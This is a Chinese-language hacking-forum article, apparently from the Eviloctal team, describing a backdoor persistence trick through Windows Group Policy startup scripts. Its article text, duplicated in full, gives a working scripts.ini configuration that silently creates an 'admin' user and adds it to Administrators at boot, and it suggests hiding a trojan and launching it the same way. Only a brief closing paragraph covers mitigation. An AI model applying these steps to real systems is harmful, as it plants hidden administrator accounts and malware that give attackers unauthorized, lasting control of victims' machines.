启动后门的一个思路
文章作者:OnlyVeR
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
组策略启动脚本;
利用过程:启动组策略(运行->gpedit.msc->计算机配置->Windows 设置->脚本(启动/关机) )
启动与关机相关设置;
选择启动->属性->添加 会弹出选择脚本名
选择程序 C:\windows\system32\net.exe 参数 user admin /add 来执行 net user admin /add
再同样添加C:\Windows\system32\net.exe localgroup administrators admin /add
来执行 net localgroup administrators admin /add
{ .老鸟跑出来say:TMD这都是费话,net user早懂了 砰的一声 (PS:我脑袋被拍个包来了) }
费话少说: 在经过进一步了解的时候发现这里是由
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\scripts.ini
(PS:默认是隐藏的.) 来控制 shutdown 和 Startup 的.
ini组成方式如下
------------------------------
[Startup]
0CmdLine=C:\WINDOWS\system32\net.exe
0Parameters=user admin /add
1CmdLine=C:\WINDOWS\system32\net.exe
1Parameters=localgroup administrators admin /add
[Shutdown]
0CmdLine=1.bat
0Parameters=
[startup] \\代表是启动
0CmdLine=C:\WINDOWS\system32\net.exe \\脚本名
0Parameters=user admin /add \\脚本参数
1CmdLine=C:\WINDOWS\system32\net.exe \\第二条脚本名
1Parameters=localgroup administrators admin /add \\第二条脚本参数
[Shutdown] \\关闭 (。。我再来一句,倒塌.还没说完又被砖给拍了下.)
0CmdLine=1.bat \\脚本名 1.bat 目录队应于 C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup
0Parameters= \\参数
------------------------------
也就是说 scripts.ini 控制着整个启动. 就如同以前 win.ini 一样
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup\ 启动文件的目录,那样脚本名路径就可以不用加详细目录名了.
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\shutdown\ 关闭文件目录, 同上.
思路就这样. copy 后门到非常隐藏的目录 再加个启动脚本参数 实现木马启动.
解决此缺陷的方法: 组策略->计算机配置->管理模板->系统->脚本 相应的禁止就行了.
或者来招毒的 彻底禁止掉这个: 把scripts.ini 对应用户权限全部删除 system administrators 全部取消. 就没人能访问了.
以上在 Windows XP SP2 均已测试成功; 文章写得菜. 希望大虾们斧正.
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
组策略启动脚本;
利用过程:启动组策略(运行->gpedit.msc->计算机配置->Windows 设置->脚本(启动/关机) )
启动与关机相关设置;
选择启动->属性->添加 会弹出选择脚本名
选择程序 C:\windows\system32\net.exe 参数 user admin /add 来执行 net user admin /add
再同样添加C:\Windows\system32\net.exe localgroup administrators admin /add
来执行 net localgroup administrators admin /add
{ .老鸟跑出来say:TMD这都是费话,net user早懂了 砰的一声 (PS:我脑袋被拍个包来了) }
费话少说: 在经过进一步了解的时候发现这里是由
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\scripts.ini
(PS:默认是隐藏的.) 来控制 shutdown 和 Startup 的.
ini组成方式如下
------------------------------
[Startup]
0CmdLine=C:\WINDOWS\system32\net.exe
0Parameters=user admin /add
1CmdLine=C:\WINDOWS\system32\net.exe
1Parameters=localgroup administrators admin /add
[Shutdown]
0CmdLine=1.bat
0Parameters=
[startup] \\代表是启动
0CmdLine=C:\WINDOWS\system32\net.exe \\脚本名
0Parameters=user admin /add \\脚本参数
1CmdLine=C:\WINDOWS\system32\net.exe \\第二条脚本名
1Parameters=localgroup administrators admin /add \\第二条脚本参数
[Shutdown] \\关闭 (。。我再来一句,倒塌.还没说完又被砖给拍了下.)
0CmdLine=1.bat \\脚本名 1.bat 目录队应于 C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup
0Parameters= \\参数
------------------------------
也就是说 scripts.ini 控制着整个启动. 就如同以前 win.ini 一样
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup\ 启动文件的目录,那样脚本名路径就可以不用加详细目录名了.
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\shutdown\ 关闭文件目录, 同上.
思路就这样. copy 后门到非常隐藏的目录 再加个启动脚本参数 实现木马启动.
解决此缺陷的方法: 组策略->计算机配置->管理模板->系统->脚本 相应的禁止就行了.
或者来招毒的 彻底禁止掉这个: 把scripts.ini 对应用户权限全部删除 system administrators 全部取消. 就没人能访问了.
以上在 Windows XP SP2 均已测试成功; 文章写得菜. 希望大虾们斧正.
顶(0)
踩(0)
上一篇:攻防技术:网络防火墙防范溢出策略
下一篇:红匣子 vs 安全黑洞
- 最新评论